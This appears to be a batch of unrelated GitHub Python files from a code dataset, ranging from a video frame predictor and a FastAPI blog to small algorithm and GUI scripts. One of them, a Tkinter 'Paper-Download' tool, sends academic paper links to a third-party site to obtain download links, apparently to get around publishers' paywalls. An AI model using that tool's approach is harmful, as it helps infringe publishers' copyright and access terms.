Predict future flow\n flow_predictor_input = {\n 'local_flow10': local_flow10,\n # 'local_mpi_flow10_mask': local_mpi_flow10_mask,\n 'num_past_steps': self.num_pred_frames + 1,\n 'num_future_steps': i + 1,\n }\n flow_predictor_output = self.local_flow_predictor(flow_predictor_input)\n local_flow12 = flow_predictor_output['local_flow12_predicted']\n # local_flow12_mask = flow_predictor_output['local_flow12_predicted_mask']\n\n # Warp mpi1 to mpi2 using local_mpi_flow12\n warper_inputs = {\n 'frame1': input_batch['frame1'],\n 'depth1': input_batch['depth1'],\n 'local_flow12': local_flow12,\n # 'local_flow12_mask': local_flow12_mask,\n 'transformation1': input_batch['transformation1'],\n 'transformation2': input_batch['transformation2'][i],\n 'intrinsic1': input_batch['intrinsic1'],\n 'intrinsic2': input_batch['intrinsic2'][i],\n 'num_mpi_planes': self.num_mpi_planes,\n }\n warper_outputs = self.warper.forward_warp_frame2mpi(warper_inputs)\n warped_mpi2_rgb, warped_mpi2_alpha = warper_outputs['warped_mpi2_rgb'], warper_outputs['warped_mpi2_alpha']\n\n infilling_inputs = {\n 'mpi_rgb': warped_mpi2_rgb,\n 'mpi_alpha': warped_mpi2_alpha,\n }\n with torch.cuda.amp.autocast():\n infilling_outputs = self.infill_mpi(infilling_inputs)\n infilled_mpi2_rgb = infilling_outputs['infilled_mpi_rgb']\n infilled_mpi2_alpha = infilling_outputs['infilled_mpi_alpha']\n\n predicted_frame2, mask2 = MpiUtils.alpha_compositing(infilled_mpi2_rgb, infilled_mpi2_alpha)\n output_batch['predicted_frames'].append(predicted_frame2)\n output_batch['predicted_frames_mask'].append(mask2)\n\n if return_intermediate_results:\n assert self.num_pred_frames == 1\n intermediate_inputs = {\n # 'mpi_rgb': mpi1_rgb,\n # 'mpi1_alpha': mpi1_alpha,\n 'frame1': input_batch['frame1'],\n 'depth1': input_batch['depth1'],\n 'local_flow12': local_flow12,\n 'total_flow_warped_mpi2_rgb': warped_mpi2_rgb,\n 'total_flow_warped_mpi2_alpha': warped_mpi2_alpha,\n }\n intermediate_outputs = self.compute_intermediate_results(intermediate_inputs)\n output_batch.update(intermediate_outputs)\n return output_batch\n\n def estimate_past_local_flow(self, input_batch):\n # Extract features\n feature_extractor_input = {\n 'mpi_rgb': input_batch['mpi1_rgb'],\n 'mpi_alpha': input_batch['mpi1_alpha'],\n }\n feature_extractor_output = self.feature_extractor(feature_extractor_input)\n mpi1_features = feature_extractor_output['mpi_features']\n feature_extractor_input = {\n 'mpi_rgb': input_batch['mpi0_rgb'],\n 'mpi_alpha': input_batch['mpi0_alpha'],\n }\n feature_extractor_output = self.feature_extractor(feature_extractor_input)\n mpi0_features = feature_extractor_output['mpi_features']\n\n # Estimate flow\n flow_estimator_input = {\n 'mpi1_features': mpi1_features,\n 'mpi2_features': mpi0_features,\n 'mpi1_alpha': input_batch['mpi1_alpha'],\n 'mpi2_alpha': input_batch['mpi0_alpha'],\n }\n flow_estimator_output = self.local_flow_estimator(flow_estimator_input)\n local_mpi_flow10 = flow_estimator_output['estimated_mpi_flows12'][0][0]\n # local_mpi_flow10_mask = flow_estimator_output['estimated_mpi_flows12'][0][1]\n\n # Take expectation of z-flow distribution\n local_mpi_flow10xy = local_mpi_flow10[:, :2]\n local_mpi_flow10z = torch.sum(local_mpi_flow10[:, 2:6] * input_batch['depth1_planes'], dim=1, keepdim=True) - input_batch['depth1_planes']\n local_mpi_flow10 = torch.cat([local_mpi_flow10xy, local_mpi_flow10z], dim=1) * input_batch['mpi1_alpha']\n\n output_batch = {\n 'local_mpi_flow10': local_mpi_flow10,\n # 'local_mpi_flow10_mask': local_mpi_flow10_mask,\n }\n return output_batch\n\n def infill_mpi(self, input_batch):\n mpi_rgb = input_batch['mpi_rgb']\n mpi_alpha = input_batch['mpi_alpha']\n\n for i in range(self.num_infilling_iterations):\n mask = MpiUtils.alpha2mask(mpi_alpha)\n infill_input_batch = {\n 'mpi_rgb': mpi_rgb,\n 'mpi_alpha': mpi_alpha,\n 'mask': mask,\n }\n infill_output_batch = self.infill_one_iter(infill_input_batch)\n mpi_rgb = infill_output_batch['infilled_mpi_rgb']\n mpi_alpha = infill_output_batch['infilled_mpi_alpha']\n # disoccluded_flow = infill_output_batch['disoccluded_flow']\n\n pred_frame, pred_mask = MpiUtils.alpha_compositing(mpi_rgb, mpi_alpha)\n output_batch = {\n # 'disoccluded_flow': disoccluded_flow,\n 'infilled_mpi_rgb': mpi_rgb,\n 'infilled_mpi_alpha': mpi_alpha,\n 'pred_frame': pred_frame,\n 'pred_mask': pred_mask,\n }\n return output_batch\n\n def infill_one_iter(self, input_batch: dict):\n flow_predictor_output = self.infilling_flow_predictor(input_batch)\n\n warper_inputs = {\n 'mpi_rgb': input_batch['mpi_rgb'],\n 'mpi_alpha': input_batch['mpi_alpha'],\n 'disoccluded_flow': flow_predictor_output['disoccluded_flow'],\n }\n warper_outputs = self.warper.bilinear_interpolation_mpi_flow2d(warper_inputs)\n mask = input_batch['mask'][:, :, :, :, None]\n infilled_mpi_rgb = mask * input_batch['mpi_rgb'] + (1 - mask) * warper_outputs['warped_rgb']\n infilled_mpi_alpha = mask * input_batch['mpi_alpha'] + (1 - mask) * warper_outputs['warped_alpha']\n\n del flow_predictor_output['disoccluded_flow'], warper_outputs['warped_rgb'], warper_outputs['warped_alpha']\n\n output_batch = {\n # 'disoccluded_flow': flow_predictor_output['disoccluded_flow'],\n 'infilled_mpi_rgb': infilled_mpi_rgb,\n 'infilled_mpi_alpha': infilled_mpi_alpha,\n }\n return output_batch\n \n def compute_intermediate_results(self, input_batch):\n output_batch = {\n 'local_flow12': input_batch['local_flow12'],\n 'total_flow_warped_mpi2_rgb': input_batch['total_flow_warped_mpi2_rgb'],\n 'total_flow_warped_mpi2_alpha': input_batch['total_flow_warped_mpi2_alpha'],\n }\n local_flow_warped_frame2 = self.warper.bilinear_splatting(input_batch['frame1'], None, input_batch['depth1'], \n input_batch['local_flow12'][:, :2], None)[0]\n total_flow_warped_frame2 = MpiUtils.alpha_compositing(input_batch['total_flow_warped_mpi2_rgb'], \n input_batch['total_flow_warped_mpi2_alpha'])[0]\n \n output_batch['local_flow_warped_frame2'] = local_flow_warped_frame2\n output_batch['total_flow_warped_frame2'] = total_flow_warped_frame2\n return output_batch\n\n def load_weights(self, flow_weights_path: Path, inpainting_weights_path: Path):\n checkpoint_state = torch.load(flow_weights_path, map_location=self.device)\n iter_num = checkpoint_state['iteration_num']\n self.load_sub_network_weights(self.feature_extractor, 'feature_extractor', checkpoint_state['model_state_dict'])\n self.load_sub_network_weights(self.local_flow_estimator, 'flow_estimator', checkpoint_state['model_state_dict'])\n print(f'Loaded Model {flow_weights_path} trained for {iter_num} iterations')\n\n checkpoint_state = torch.load(inpainting_weights_path, map_location=self.device)\n iter_num = checkpoint_state['iteration_num']\n self.load_sub_network_weights(self.infilling_flow_predictor, 'flow_predictor', checkpoint_state['model_state_dict'])\n print(f'Loaded Model {inpainting_weights_path} trained for {iter_num} iterations')\n return\n\n @staticmethod\n def load_sub_network_weights(network, network_name, weights_dict: OrderedDict):\n selected_weights = OrderedDict()\n for weight_name in weights_dict.keys():\n if weight_name.startswith(network_name):\n new_weight_name = weight_name[len(network_name)+1:]\n selected_weights[new_weight_name] = weights_dict[weight_name]\n network.load_state_dict(selected_weights)\n return\n","repo_name":"NagabhushanSN95/DeCOMPnet","sub_path":"src/frame_predictors/FramePredictor01.py","file_name":"FramePredictor01.py","file_ext":"py","file_size_in_byte":12283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"23380420730","text":"from typing import List, Optional\r\n\r\n\r\nfrom alphabt.order.order import Order\r\nfrom alphabt.position.manager import PositionManager\r\n\r\nclass OrderManager:\r\n\r\n _order_queue = []\r\n\r\n @classmethod\r\n def add_order(cls, \r\n order: Order, \r\n send_to_queue_when_overweight: bool) -> None:\r\n\r\n\r\n\r\n reorganize_order_list = cls().reorganize_order()\r\n\r\n if reorganize_order_list is not None:\r\n if not send_to_queue_when_overweight:\r\n return None\r\n cls._order_queue.extend(reorganize_order_list)\r\n else:\r\n\r\n cls._order_queue.append(order)\r\n\r\n\r\n def reorganize_order(self) -> Optional[List[Order]]:\r\n \r\n order_in_position = PositionManager._order_in_position\r\n close_order_idx = PositionManager.find_close_order_index()\r\n\r\n if close_order_idx == 0:\r\n return None\r\n\r\n close_order = order_in_position[close_order_idx]\r\n\r\n\r\n if abs(close_order.unit) >= 2:\r\n\r\n ticker = close_order.ticker\r\n close_price = close_order.exit_price\r\n close_date = close_order.exit_date\r\n\r\n # beause of the action of close position, \r\n # the unit must mutiply -1 to origin order unit\r\n reorganize_unit = [-o.unit for o in order_in_position[: close_order_idx]]\r\n reorganize_order = [Order(ticker=ticker,\r\n unit=u,\r\n action='close',\r\n exit_date=close_date,\r\n exit_price = close_price) \r\n for u in reorganize_unit] \r\n return reorganize_order + order_in_position[close_order_idx + 1: ]\r\n return None\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ChingHuanChiu/alphabt","sub_path":"alphabt/order/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"7533829787","text":"import os\r\nimport sys\r\nimport random\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom tqdm import tqdm\r\nfrom itertools import chain\r\nfrom skimage.io import imread, imshow, imread_collection, concatenate_images\r\nfrom skimage.transform import resize\r\nfrom skimage.morphology import label\r\n\r\nfrom keras.models import Model, load_model\r\nfrom keras.layers import Input\r\nfrom keras.layers.core import Dropout, Lambda\r\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\r\nfrom keras.layers.pooling import MaxPooling2D\r\nfrom keras.layers.merge import concatenate\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras import backend as K\r\n\r\nimport tensorflow as tf\r\nos.chdir('D:/Downloads/Madam Amelia/Data Bowl')\r\n# Set some parameters\r\nBATCH_SIZE = 10 # the higher the better\r\nIMG_WIDTH = 128 # for faster computing on kaggle\r\nIMG_HEIGHT = 128 # for faster computing on kaggle\r\nIMG_CHANNELS = 3\r\nTRAIN_PATH = 'D:/Downloads/Madam Amelia/Data Bowl/stage1_train/'\r\nTEST_PATH = 'D:/Downloads/Madam Amelia/Data Bowl/stage1_test/'\r\n\r\nwarnings.filterwarnings('ignore', category=UserWarning, module='skimage')\r\nseed = 42\r\n\r\ntrain_ids = next(os.walk(TRAIN_PATH))[1]\r\ntest_ids = next(os.walk(TEST_PATH))[1]\r\nnp.random.seed(10)\r\n\r\n# Get and resize train images and masks\r\nX_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\r\nY_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\r\n\r\nprint('Getting and resizing train images and masks ... ')\r\nsys.stdout.flush()\r\nfor n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\r\n path = TRAIN_PATH + id_\r\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\r\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\r\n X_train[n] = img\r\n mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\r\n for mask_file in next(os.walk(path + '/masks/'))[2]:\r\n mask_ = imread(path + '/masks/' + mask_file)\r\n mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',\r\n preserve_range=True), axis=-1)\r\n mask = np.maximum(mask, mask_)\r\n Y_train[n] = mask\r\n\r\n# Get and resize test images\r\nX_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\r\nsizes_test = []\r\nprint('Getting and resizing test images ... ')\r\nsys.stdout.flush()\r\nfor n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):\r\n path = TEST_PATH + id_\r\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\r\n sizes_test.append([img.shape[0], img.shape[1]])\r\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\r\n X_test[n] = img\r\n\r\nprint('Done!')\r\n\r\n\r\nfrom keras.preprocessing import image\r\n\r\n# Creating the training Image and Mask generator\r\nimage_datagen = image.ImageDataGenerator(shear_range=0.5, rotation_range=50, zoom_range=0.2, width_shift_range=0.2, height_shift_range=0.2, fill_mode='reflect')\r\nmask_datagen = image.ImageDataGenerator(shear_range=0.5, rotation_range=50, zoom_range=0.2, width_shift_range=0.2, height_shift_range=0.2, fill_mode='reflect')\r\n\r\n# Keep the same seed for image and mask generators so they fit together\r\n\r\nimage_datagen.fit(X_train[:int(X_train.shape[0]*0.9)], augment=True, seed=seed)\r\nmask_datagen.fit(Y_train[:int(Y_train.shape[0]*0.9)], augment=True, seed=seed)\r\n\r\nx=image_datagen.flow(X_train[:int(X_train.shape[0]*0.9)],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\ny=mask_datagen.flow(Y_train[:int(Y_train.shape[0]*0.9)],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\n\r\n\r\n\r\n# Creating the validation Image and Mask generator\r\nimage_datagen_val = image.ImageDataGenerator()\r\nmask_datagen_val = image.ImageDataGenerator()\r\n\r\nimage_datagen_val.fit(X_train[int(X_train.shape[0]*0.9):], augment=True, seed=seed)\r\nmask_datagen_val.fit(Y_train[int(Y_train.shape[0]*0.9):], augment=True, seed=seed)\r\n\r\nx_val=image_datagen_val.flow(X_train[int(X_train.shape[0]*0.9):],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\ny_val=mask_datagen_val.flow(Y_train[int(Y_train.shape[0]*0.9):],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\n\r\n\r\nfrom matplotlib import pyplot as plt\r\n#matplotlib inline\r\n\r\nimshow(x.next()[0].astype(np.uint8))\r\nplt.show()\r\nimshow(np.squeeze(y.next()[0].astype(np.uint8)))\r\nplt.show()\r\nimshow(x_val.next()[0].astype(np.uint8))\r\nplt.show()\r\nimshow(np.squeeze(y_val.next()[0].astype(np.uint8)))\r\nplt.show()","repo_name":"BotOreo/Python-Files","sub_path":"Madam Amelia.py","file_name":"Madam Amelia.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19257129544","text":"import sys\nimport time\nimport numpy as np\n\n\ndef glouton(data):\n\n solution = []\n emplacements_disp = data['emplacements']\n capacite = data['capacite']\n\n while capacite > 0:\n\n emplacements_disp = [x for x in emplacements_disp if x[2] <= capacite]\n\n if len(emplacements_disp) == 0:\n return solution\n\n rentabilite = np.zeros(len(emplacements_disp))\n for i in range(len(rentabilite)):\n rentabilite[i] = emplacements_disp[i][1] / emplacements_disp[i][2]\n rentabilite_sum = rentabilite.sum()\n probabilites = rentabilite / rentabilite_sum\n\n idx = np.random.choice(np.arange(0, len(emplacements_disp)), p=probabilites)\n\n capacite -= emplacements_disp[idx][2]\n solution.append(emplacements_disp[idx])\n emplacements_disp.remove(emplacements_disp[idx])\n\n return solution\n\n\ndef run(data):\n\n best_sol = []\n best_sum = 0\n\n for j in range(0, 10):\n\n sol = glouton(data)\n somme = sum([x[1] for x in sol])\n\n if best_sum < somme:\n best_sol = sol\n best_sum = somme\n\n return best_sol, best_sum\n\n\ndef main():\n\n data = {\n 'nbEmplacements': 0,\n 'emplacements': [],\n 'capacite': 0\n }\n\n ex_path = sys.argv[1] # Path de l'exemplaire\n options = sys.argv[2:]\n\n with open(ex_path, \"r\") as fp:\n for i, line in enumerate(fp):\n if i == 0:\n data['nbEmplacements'] = int(line.strip())\n elif i <= data['nbEmplacements']:\n data['emplacements'].append(tuple(map(int, line.strip().split())))\n else:\n data['capacite'] = int(line.strip())\n\n start_time = time.time()\n\n solution, max_revenu = run(data)\n\n execution_time = time.time() - start_time\n\n if '-p' in options: # On imprime la solution\n # print('Solution avec revenu = ' + str(max_revenu))\n for idx, place in enumerate(solution):\n end = ','\n if idx == len(solution) - 1:\n end = '\\n'\n print(place[0], end=end)\n if '-t' in options: # On imprime le temps d'exécution\n print(execution_time)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Observablerxjs/TPs-8775","sub_path":"tp2/src/glouton.py","file_name":"glouton.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27222744271","text":"import pandas as pd\nimport streamlit as st\n\nimport SessionState\n\nsession = SessionState.get(columns=None)\n\nst.info(\n \"## Instructions:\\n\"\n + \"1. Upload simple csv (like `data.csv` from this repo)\\n\"\n + \"2. Check the box to choose column names\\n\"\n + \"3. Deselect one of the column names\\n\"\n + \"4. Try to add that column name back, note that it takes two tries\\n\"\n)\n\ncsv_file = st.file_uploader(\"File\", type=\"csv\")\n\nif csv_file is not None:\n dataframe = pd.read_csv(csv_file)\n all_columns = list(dataframe.columns)\n if session.columns is None:\n session.columns = all_columns.copy()\n if st.checkbox(\"Select Columns\", False):\n session.columns = st.multiselect(\n \"Columns\", all_columns, session.columns\n )\n st.write(dataframe.filter(list(session.columns)))\n","repo_name":"benlindsay/streamlit-double-input-error","sub_path":"1_hideable_column_selection_with_sessionstate.py","file_name":"1_hideable_column_selection_with_sessionstate.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12914922008","text":"from PIL import Image, ImageDraw, ImageFont\nfrom HoldemChartCreator.hands import hands\n\nDEFAULT_BORDER = 5\nMIN_CELL_SIZE = 20\nCELL_PADDING_PERCENTAGE = 0.1\n\n\ndef create_chart(width, height, colors, bd=DEFAULT_BORDER, bg='black'):\n img = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n margin_l, cell_w, margin_r = calculate_boundaries(width, bd=bd)\n margin_t, cell_h, margin_b = calculate_boundaries(height, bd=bd)\n font = scale_font(min(cell_h, cell_w) * (1 - 2 * CELL_PADDING_PERCENTAGE))\n draw.rectangle(((margin_l, margin_t), (width - margin_r, height - margin_b)), fill=bg)\n for i, (hands_row, colors_row) in enumerate(zip(hands, colors)):\n for j, (hand, color) in enumerate(zip(hands_row, colors_row)):\n NW = (margin_l + bd + (cell_w + bd) * j, margin_t + bd + (cell_h + bd) * i)\n SE = (margin_l + (cell_w + bd) * (j + 1), margin_t + (cell_h + bd) * (i + 1))\n draw.rectangle((NW, SE), fill=color['bg'])\n if i == j:\n text_offset = NW[0] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_w), \\\n NW[1] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_h)\n else:\n text_offset = NW[0] + int(CELL_PADDING_PERCENTAGE * cell_w), \\\n NW[1] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_h)\n draw.text(text_offset, hand, font=font, fill=color['fg'])\n return img\n\n\ndef calculate_boundaries(size, bd=DEFAULT_BORDER):\n x = int((size - bd) / 13) - bd\n if x < MIN_CELL_SIZE:\n raise ValueError\n l = (size - bd - (x + bd) * 13) // 2\n r = size - (x + bd) * 13 - l - bd\n return l, x, r\n\n\ndef scale_font(size, font=\"consola.ttf\"):\n x = 1\n f = ImageFont.truetype(font, x)\n while f.getsize(\"XXx\")[0] < size:\n x += 1\n f = ImageFont.truetype(font, x)\n return f\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"noplus/HoldemChartCreator","sub_path":"HoldemChartCreator/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21530063874","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n stack = []\n res = []\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n res.append(root.val)\n root = root.right\n return res\n\n#Iteratively\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n res = []\n def helper(node):\n if node:\n helper(node.left)\n res.append(node.val)\n helper(node.right)\n helper(root)\n return res\n#Recursive","repo_name":"HHonoka/LeetCode-","sub_path":"LeetCode Tree/venv/LeetCode 94 Binary Tree Inorder Traversal.py","file_name":"LeetCode 94 Binary Tree Inorder Traversal.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19503156951","text":"import re\r\nimport logging\r\nimport os\r\nimport zipfile\r\nimport time\r\n\r\n\r\ndef month(m):\r\n li = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\r\n \"July\", \"September\", \"October\", \"November\", \"December\"]\r\n return li[m - 1]\r\n\r\n\r\nif not os.path.exists(\"log\"):\r\n os.makedirs(\"log\")\r\nelse:\r\n localtime = time.localtime()\r\n year = localtime.tm_year\r\n mon = month(localtime.tm_mon)\r\n day = localtime.tm_mday\r\n hour = localtime.tm_hour\r\n mini = localtime.tm_min\r\n titleX = \"log\\\\exchange{0}y{1}{2}d{3}h{4}min{5}sec.zip\".format(year, mon, day, hour, mini,\r\n str(localtime.tm_sec + time.time() % 1))\r\n jungle_zip = zipfile.ZipFile(titleX, 'w')\r\n jungle_zip.write('log\\\\exchange_log.log', compress_type=zipfile.ZIP_DEFLATED)\r\n jungle_zip.close()\r\n\r\nlogger = logging.getLogger(\"logger\")\r\nlogger.setLevel(logging.DEBUG)\r\nfmt = logging.Formatter(fmt=\"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\r\nsh = logging.StreamHandler()\r\nsh.setFormatter(fmt)\r\nsh.setLevel(logging.INFO)\r\nfh = logging.FileHandler(\"log/exchange_log.log\", \"w\", encoding=\"utf-8\")\r\nfh.setLevel(logging.DEBUG)\r\nfh.setFormatter(fmt)\r\nlogger.addHandler(sh)\r\nlogger.addHandler(fh)\r\n\r\n\r\nprint(\"\"\"\r\n0V 01C 002F 0003D版本\r\nb/B/0代表二进制\r\no/O/1代表八进制\r\nd/D/10代表十进制\r\nh/H/16代表十六进制\r\n输入的三个参数用两个空格分开,\r\n第一个是初始数值,不用加任何前缀\r\n第二个是初始类型,用上面的表示,\r\n第三个是您要转换成的类型,用上面的表示\r\n\"\"\")\r\n\r\n\r\ndef f(v=\"\"):\r\n if (v == \"b\") or (v == \"B\"):\r\n return 0\r\n elif (v == \"o\") or (v == \"O\"):\r\n return 1\r\n elif (v == \"d\") or (v == \"D\"):\r\n return 2\r\n elif (v == \"h\") or (v == \"H\"):\r\n return 3\r\n\r\n\r\ndef _f(v=0):\r\n if v == 0:\r\n return 2\r\n elif v == 1:\r\n return 8\r\n elif v == 2:\r\n return 10\r\n elif v == 3:\r\n return 16\r\n\r\n\r\nwhile True:\r\n num = input(\"Please input the number and type, split with two space:\")\r\n num = num.split(\" \") # 转化成两个部分,第一部分是数字,第二部分是格式,第三部分是转换后的格式\r\n logger.debug(f\"You input:{num}\")\r\n if num[0] == '': # 输入不能为空\r\n logger.warning(\"请输入数字\")\r\n continue\r\n\r\n number = num[0]\r\n if bool(re.search(\"[^0-9a-fA-F]\", str(number))):\r\n logger.warning(\"请输入一个整数\")\r\n continue\r\n try:\r\n t = f(num[1])\r\n except IndexError:\r\n tl = [True, True, True, True]\r\n for s in str(number):\r\n if tl[0] and bool(re.match(\"[^0-1]\", s)):\r\n tl[0] = False\r\n if tl[1] and bool(re.match(\"[^0-7]\", s)):\r\n tl[1] = False\r\n if tl[2] and bool(re.match(\"[^0-9]\", s)):\r\n tl[2] = False\r\n if tl[3] and bool(re.match(\"[^0-9a-fA-F]\", s)):\r\n tl[3] = False\r\n if tl[2] and (not tl[0]):\r\n t = 2\r\n else:\r\n t = tl.index(True)\r\n try:\r\n t_to = f(num[2])\r\n except IndexError:\r\n if t != 2:\r\n t_to = 2\r\n else:\r\n t_to = 0\r\n\r\n logger.info(f\"智能判断为{t} -- {t_to}\")\r\n try:\r\n out = int(str(number), _f(t))\r\n except ValueError:\r\n logger.warning(\"指示错误\")\r\n continue\r\n if t_to == 0:\r\n out = bin(out)\r\n elif t_to == 1:\r\n out = oct(out)\r\n elif t_to == 3:\r\n out = hex(out)\r\n logger.exception(f\"从{number}转换成{out}\")\r\n","repo_name":"hsszl/exchange_base","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24232012939","text":"from fastapi import APIRouter\n\nimport response\nfrom config.db import conn\nfrom models.index import blogs\nfrom schemas.index import Blog\nfrom transformer import BlogTransformer\nblog = APIRouter()\n\n@blog.get(\"/\")\nasync def read_data():\n try:\n blog_data = conn.execute(blogs.select()).fetchall()\n # return conn.execute(blogs.select()).fetchall()\n transformer = BlogTransformer.transform(blog_data)\n return response.ok(transformer, \"\")\n except Exception as e:\n return response.badRequest('', f'{e}')\n\n\n@blog.get(\"/{id}\")\nasync def read_data(id : int):\n return conn.execute(blogs.select().where(blogs.c.id == id)).fetchall()\n\n@blog.post(\"/\")\nasync def write_data(blog: Blog):\n conn.execute(blogs.insert().values(\n title = blog.title,\n slug = blog.slug,\n description = blog.description\n ))\n return conn.execute(blogs.select()).fetchall()\n\n@blog.put(\"/{id}\")\nasync def update_data(id:int, blog: Blog):\n conn.execute(blogs.update().values(\n title=blog.title,\n slug=blog.slug,\n description=blog.description\n ).where(blogs.c.id == id))\n return conn.execute(blogs.select()).fetchall()\n\n@blog.delete(\"/{id}\")\nasync def delete_data(id: int):\n conn.execute(blogs.delete().where(blogs.c.id == id))\n return conn.execute(blogs.select()).fetchall()","repo_name":"furqanismail/fastapi-rest-crud","sub_path":"routes/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"908674518","text":"#coding = utf-8\nimport re\nimport requests\nimport webbrowser\nimport tkinter as tk\nimport tkinter.messagebox\n\"\"\"\nauthor : Srpihot\ngithub : https://github.com/Srpihot\nupdate_time : 2020-06-15\nversion : Fuck-Paper-download v1.1\n\"\"\"\ndef get_link(url_get):\n paper_link=url_get.get()\n try:\n if 'wanfangdata.com.cn' in paper_link:\n #遇到万方进行参数处理\n temp_re = re.compile('(^|&)id=([^&]*)',re.S)\n temp = re.findall(temp_re,paper_link)\n paper_link = 'http://d.wanfangdata.com.cn/Periodical/'+temp[0][1]\n\n headers={\n 'Host': 'ifish.fun',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n }\n base_url='https://ifish.fun/paper/search?key='\n url=base_url+paper_link\n html=requests.get(url=url,headers=headers).text\n\n pattern=re.compile('下载地址:(.*?)(.*?)',re.S)\n results=re.findall(pattern,html)\n download_link = results[0][2]\n webbrowser.open(download_link,new=1)\n except:\n tkinter.messagebox.showerror(title='错误', message='请检查网址是否正确!') \n\n\ndef main():\n windows = tk.Tk()\n windows.title('Paper-Download V1.1 By-Srpihot*')\n windows.geometry('500x150')\n windows.iconbitmap(r'./lib/icon.ico')\n icon = tk.PhotoImage(file=r'./lib/icon.png')\n icon_p = tk.Canvas(windows,width=80,height=80)\n icon_p.create_image(40,40,image=icon)\n icon_p.place(x=40,y=7)\n name = tk.Label(windows,text='Paper Download',font=('微软雅黑',30),width=15,height=1)\n name.place(x=110,y=9)\n use_how = tk.Label(windows,text='使用方法:输入具体网址点击下载即食用',font=('微软雅黑',8),width=30,height=1)\n use_how.place(x=0,y=120)\n notice = tk.Label(windows,text='仅供学习参考,若所造成的法律责任与本人无关.',font=('微软雅黑',8),fg='red',width=35,height=1)\n notice.place(x=240,y=120)\n url_get = tk.Entry(windows, show = None , font=('Arial',14),width=30)\n url_get.place(x=20,y=90)\n but=tk.Button(windows,text=\"���载\",command=lambda : get_link(url_get),width=10)\n but.place(x=390,y=89)\n windows.mainloop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Srpihot/Paper-Download","sub_path":"fuck-paper-download.py","file_name":"fuck-paper-download.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"31"} +{"seq_id":"12580549637","text":"import tkinter as tk\n\nwindow = tk.Tk()\n\nwindow.title(\"Student Management System\")\nnames=[] #학생의 이름\nnumbers=[] #학생의 학번\nphones=[] #학생의 핸드폰 번호\npasswords = [] # 학생의 비밀번호\ncourse=[\"프로그래밍 입문\",\"크리에이티브디자인\",\"AI응용수학\",\"DU실용영어\",\"AI융합비전설계\",\"나의대학생활과진로\",\"컴퓨팅사과와코딩\",\"DU사랑빛자유프로젝트\"] #학생의 